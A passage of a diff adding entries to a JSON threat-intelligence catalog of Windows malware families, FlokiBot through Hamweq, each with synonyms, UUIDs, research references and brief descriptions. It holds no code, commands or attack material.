"https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/", + "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", + "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", + "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/" + ] + }, + "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", + "value": "FlokiBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif", + "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" + ] + }, + "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd", + "value": "Floxif", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc", + "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/" + ] + }, + "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03", + "value": "Flusihoc", + "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber", + "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", + "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf", + "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", + "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", + "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html" + ] + }, + "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", + "value": "Fobber", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", + "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", + "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", + "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", + "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", + "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", + "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", + "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" + ] + }, + "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", + "value": "Formbook", + "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware." + }, + { + "meta": { + "synonyms": [ + "ffrat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", + "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" + ] + }, + "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", + "value": "FormerFirstRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", + "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + ] + }, + "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", + "value": "Freenki Loader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BitPaymer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", + "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" + ] + }, + "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", + "value": "FriedEx", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f", + "https://sentinelone.com/blogs/sfg-furtims-parent/" + ] + }, + "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1", + "value": "Furtim", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader" + ] + }, + "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe", + "value": "GalaxyLoader", + "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n" + }, + { + "meta": { + "synonyms": [ + "pios" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos", + "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf" + ] + }, + "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66", + "value": "gamapos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga" + ] + }, + "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92", + "value": "Gameover DGA", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ZeuS P2P", + "GOZ" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", + "https://www.wired.com/?p=2171700", + "https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf", + "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", + "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", + "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf" + ] + }, + "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f", + "value": "Gameover P2P", + "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol" + ] + }, + "uuid": "9664712b-81f1-4c52-ad4d-a657a120fded", + "value": "Gamotrol", + "description": "" + }, + { + "meta": { + "synonyms": [ + "GrandCrab" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", + "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", + "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", + "http://asec.ahnlab.com/1145", + "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", + "https://isc.sans.edu/diary/23417", + "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", + "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", + "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/" + ] + }, + "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", + "value": "win.gandcrab", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox", + "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html" + ] + }, + "uuid": "591b2882-65ba-4629-9008-51ed3467510a", + "value": "Gaudox", + "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only)." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss", + "http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html" + ] + }, + "uuid": "5f8be453-8f73-47a2-9c9f-e8b9b02f5691", + "value": "Gauss", + "description": "" + }, + { + "meta": { + "synonyms": [ + "WhiteBear" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer", + "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", + "https://securelist.com/introducing-whitebear/81638/", + "https://www.youtube.com/watch?v=Pvzhtjl86wc", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", + "https://github.com/eset/malware-ioc/tree/master/turla" + ] + }, + "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", + "value": "Gazer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman", + "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" + ] + }, + "uuid": "ed0586d1-4ff0-4d39-87c7-1414f600d16e", + "value": "gcman", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer", + "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html", + "https://www.rekings.com/ispy-customers/" + ] + }, + "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128", + "value": "GearInformer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Emotet", + "Heodo" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo", + "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", + "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", + "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", + "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", + "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", + "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", + "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", + "https://www.us-cert.gov/ncas/alerts/TA18-201A", + "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", + "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", + "https://feodotracker.abuse.ch/?filter=version_e", + "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", + "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" + ] + }, + "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", + "value": "Geodo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a", + "value": "GetMail", + "description": "" + }, + { + "meta": { + "synonyms": [ + "getmypos" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass", + "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/", + "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html" + ] + }, + "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", + "value": "GetMyPass", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CoreImpact (Modified)" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", + "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", + "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", + "https://www.coresecurity.com/core-impact" + ] + }, + "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", + "value": "Ghole", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Remosh" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", + "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", + "https://en.wikipedia.org/wiki/GhostNet" + ] + }, + "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd", + "value": "Gh0stnet", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ghost iBot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin", + "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", + "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" + ] + }, + "uuid": "6201c337-1599-4ced-be9e-651a624c20be", + "value": "GhostAdmin", + "description": "" + }, + { + "meta": { + "synonyms": [ + "PCRat", + "Gh0st RAT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", + "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", + "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", + "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "http://www.malware-traffic-analysis.net/2018/01/04/index.html", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", + "http://www.hexblog.com/?p=1248", + "https://blog.cylance.com/the-ghost-dragon" + ] + }, + "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", + "value": "Ghost RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Wordpress Bruteforcer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses", + "https://forum.exploit.in/pda/index.php/t102378.html" + ] + }, + "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", + "value": "Glasses", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat", + "https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" + ] + }, + "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", + "value": "GlassRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", + "https://blog.ensilo.com/globeimposter-ransomware-technical", + "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet", + "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", + "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", + "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", + "https://isc.sans.edu/diary/23417" + ] + }, + "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", + "value": "GlobeImposter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom" + ] + }, + "uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", + "value": "Globe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", + "value": "GlooxMail", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", + "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", + "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", + "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/", + "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", + "http://resources.infosecinstitute.com/tdss4-part-1/" + ] + }, + "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", + "value": "win.glupteba", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" + ] + }, + "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", + "value": "Godzilla Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", + "value": "Goggles", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Petya/Mischa" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", + "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html", + "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" + ] + }, + "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", + "value": "GoldenEye", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", + "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" + ] + }, + "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", + "value": "GoldDragon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", + "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" + ] + }, + "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", + "value": "Golroted", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Fuerboos" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", + "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" + ] + }, + "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", + "value": "Goodor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat", + "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf" + ] + }, + "uuid": "d1298818-6425-49be-9764-9f119d964efd", + "value": "GoogleDrive RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic", + "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" + ] + }, + "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", + "value": "GooPic Drooper", + "description": "" + }, + { + "meta": { + "synonyms": [ + "talalpek", + "Xswkit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", + "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669", + "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", + "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", + "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", + "https://www.us-cert.gov/ncas/alerts/TA16-336A", + "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", + "https://www.youtube.com/watch?v=242Tn0IL2jE", + "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", + "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", + "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", + "https://news.drweb.com/show/?i=4338&lng=en", + "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/", + "https://www.youtube.com/watch?v=QgUlPvEE4aw", + "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055" + ] + }, + "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", + "value": "GootKit", + "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat", + "https://www.yumpu.com/en/document/view/55930175/govrat-v20" + ] + }, + "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", + "value": "GovRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CRM", + "Gozi CRM", + "Papras", + "Snifula", + "Ursnif" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", + "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/", + "https://www.secureworks.com/research/gozi", + "https://lokalhost.pl/gozi_tree.txt", + "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html" + ] + }, + "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", + "value": "Gozi", + "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", + "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2", + "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", + "https://de.securelist.com/analysis/59479/erpresser/", + "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", + "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/" + ] + }, + "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", + "value": "GPCode", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot", + "http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" + ] + }, + "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", + "value": "GrabBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor", + "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" + ] + }, + "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", + "value": "Graftor", + "description": "" + }, + { + "meta": { + "synonyms": [ + "FrameworkPOS", + "trinity" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", + "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" + ] + }, + "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063", + "value": "Grateful POS", + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem", + "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" + ] + }, + "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", + "value": "Gratem", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", + "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", + "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" + ] + }, + "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", + "value": "Gravity RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "eoehttp" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan", + "https://blog.cylance.com/spear-a-threat-actor-resurfaces" + ] + }, + "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", + "value": "GreenShaitan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok", + "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" + ] + }, + "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", + "value": "GROK", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump", + "https://attack.mitre.org/wiki/Technique/T1003" + ] + }, + "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", + "value": "gsecdump", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1", + "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" + ] + }, + "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", + "value": "H1N1 Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", + "value": "Hacksfase", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy", + "https://github.com/ratty3697/HackSpy-Trojan-Exploit" + ] + }, + "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", + "value": "HackSpy", + "description": "Py2Exe based tool as found on github." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", + "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" + ] + }, + "uuid": 